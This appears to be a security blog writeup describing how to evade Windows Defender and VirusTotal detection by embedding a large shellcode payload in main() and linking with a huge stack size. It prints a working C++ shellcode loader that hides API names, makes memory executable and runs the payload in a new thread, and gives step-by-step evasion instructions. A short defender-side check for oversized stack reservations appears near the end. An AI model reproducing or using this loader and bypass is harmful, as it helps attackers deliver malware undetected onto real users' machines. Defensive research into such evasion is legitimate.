Deceiving Defender: The Big Stack Bypass

Defeating Windows Defender detection on Windows 10 by creating a large (>2MB) payload allocated on the stack

Part One: Introduction

I stumbled upon this trick during my demonstration of the byoDLL technique documented in Unholy Unhooking. Basically, the bypass goes like this:
  • The default stack reservation for a program built with the MSVC linker is 1 MB (1024 KB)
  • Local variables initialized in main() are stored on the stack at run time
  • If you generate a payload > 1024KB and hard-code it in main, your program will overflow its stack and crash
  • If you compile with /STACK:*BIG_NUMBER* you'll win
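The stack budget behind those bullets is just arithmetic, and a rough sketch of it might look like the following. The helper name fits_in_stack and the 64 KB of headroom for return addresses and callee frames are my own assumptions for illustration, not something measured in this writeup.

```cpp
#include <cstdint>

// Default stack reservation when no /STACK option is given: 1 MB.
constexpr std::uint64_t kDefaultStackReserve = 1024ull * 1024ull;

// Hypothetical helper: true if `local_bytes` of local variables fit inside
// `reserve_bytes` while leaving `headroom_bytes` for everything else on the
// stack (return addresses, saved registers, callee frames).
// The 64 KB default headroom is an assumed, illustrative value.
constexpr bool fits_in_stack(std::uint64_t local_bytes,
                             std::uint64_t reserve_bytes = kDefaultStackReserve,
                             std::uint64_t headroom_bytes = 64ull * 1024ull) {
    // Written as two comparisons so the subtraction can never underflow.
    return local_bytes <= reserve_bytes &&
           headroom_bytes <= reserve_bytes - local_bytes;
}

// 512 KB of locals fits in the default reservation, 2 MB does not.
static_assert(fits_in_stack(512ull * 1024ull), "fits in default stack");
static_assert(!fits_in_stack(2ull * 1024ull * 1024ull), "exceeds default stack");
```

Passing a larger reserve_bytes models what a bigger /STACK value changes: the same 2 MB of locals fits once the reservation is raised well above it.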

Part Two: Testing it out

We start out with the following code:
#include <windows.h>
#include <stdio.h>
#include <time.h>
#include <random>
typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HANDLE (WINAPI * CreateThread_t)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags,LPDWORD lpThreadId);
unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};
unsigned char sCreateThread[] = {'C','r','e','a','t','e','T','h','r','e','a','d',0x0,};
//msfvenom calc payload
unsigned char payload[] = { […snip…]};
int main(VOID) {
size_t payload_len = sizeof(payload);
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
//function pointers
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "KErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
CreateThread_t CreateThread_p = (CreateThread_t) GetProcAddress(GetModuleHandle((LPCSTR) "kERnEl32.DLl"), (LPCSTR) sCreateThread);
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to program memory ; this gets inlined
RtlMoveMemory(exec_mem, payload, payload_len);
// Make payload executable
rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nLaunch Payload?\n");
getchar();
// Run payload
if ( rv != 0 ) {
th = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, INFINITE);
}
return 0;
}
If we compile this and move the executable to our test directory, we can expect to get detected.
ThreatCheck helps us out with that so we don't waste too much time validating what we already know.

Part Three: the cool part

BUT! If we move the payload inside of main and front-load it with NOPs (> 1024KB worth; you can generate these using any method of your choice, I prefer Python), then compile with the default stack size, something interesting will happen.
Your code should look something like this now.
Everything should compile, but your program will fail to run!
If we look at the program with x64dbg, we can see that we end up overflowing our own stack during execution!
Let's compile with /STACK:2000000000 set, which should give us plenty of space to put everything we need on the stack at run time.
It works!
ThreatCheck still finds our payload though…?
Let's make it a 2MB payload and a 3MB stack. The implant comes in at over 16MB, but if we drag and drop the implant into our test folder…

Part Four: ???

[Intentionally left blank]

Part Five: Profit

We survive!
We double check our survivability with ThreatCheck.
And we can run it from our test folder without being detected by Windows Defender!
But if we move the payload outside of main and into the data section of our program, it will once again be detected by Defender.
It's also not a matter of file size: we can append some trash data to our detectable implant and it will still be detected.

Part Six: Conclusion

In this writeup, we demonstrated Windows Defender's inability to detect programs with large stacks, allowing determined attackers to craft undetectable malware so long as the payload is initialized in the .text section of the program.
The downside to this approach is that your executable file is huge by payload delivery standards. Deploying this technique in a development environment can get a little tedious as well. You can expect a lot of application crashes and the compile time for this approach is significantly longer than other methods. Nonetheless, this provides another potential avenue of attack for malicious actors and defenders should be aware of it.
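For defenders, one cheap signal worth considering is the stack reservation recorded in the PE optional header, since a /STACK value far above the 1 MB default ends up in the SizeOfStackReserve field. The sketch below is only a triage idea under my own assumptions: the function names and the 64 MB threshold are hypothetical, and I have not tested it against the implants in this writeup. It reads the field from an in-memory copy of the file using the documented PE layout (e_lfanew at offset 0x3C, SizeOfStackReserve at offset 72 of the optional header).

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Read an n-byte little-endian unsigned value at `off`; false if out of range.
static bool read_le(const std::vector<std::uint8_t>& b, std::size_t off,
                    std::size_t n, std::uint64_t& out) {
    if (n > 8 || off > b.size() || n > b.size() - off) return false;
    out = 0;
    for (std::size_t i = 0; i < n; ++i)
        out |= static_cast<std::uint64_t>(b[off + i]) << (8 * i);
    return true;
}

// Extract SizeOfStackReserve from a PE image; false if the buffer is not a
// well-formed PE32 or PE32+ file.
bool read_stack_reserve(const std::vector<std::uint8_t>& image,
                        std::uint64_t& reserve) {
    std::uint64_t v = 0;
    if (!read_le(image, 0, 2, v) || v != 0x5A4D) return false;      // "MZ"
    if (!read_le(image, 0x3C, 4, v)) return false;                  // e_lfanew
    const std::size_t pe = static_cast<std::size_t>(v);
    if (!read_le(image, pe, 4, v) || v != 0x00004550) return false; // "PE\0\0"
    const std::size_t opt = pe + 4 + 20; // skip signature and COFF file header
    std::uint64_t magic = 0;
    if (!read_le(image, opt, 2, magic)) return false;
    if (magic == 0x10B) return read_le(image, opt + 72, 4, reserve); // PE32
    if (magic == 0x20B) return read_le(image, opt + 72, 8, reserve); // PE32+
    return false;
}

// Hypothetical triage rule: flag images whose stack reservation exceeds
// `threshold`. The 64 MB default is an assumed value, not a tuned one.
bool has_oversized_stack(const std::vector<std::uint8_t>& image,
                         std::uint64_t threshold = 64ull * 1024ull * 1024ull) {
    std::uint64_t reserve = 0;
    return read_stack_reserve(image, reserve) && reserve > threshold;
}
```

A large reservation is not malicious on its own, so this is better treated as one input to further inspection than as a verdict.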

Part Seven: Encore

Totally by chance I had the thought to upload this to VirusTotal as well, and look what we found.
If you only use the implant code without the bypass, you can expect something like this:
Apparently large stack usage breaks a lot of automated analysis. Who knew. This article probably also belongs in my ZeroTotal series lol
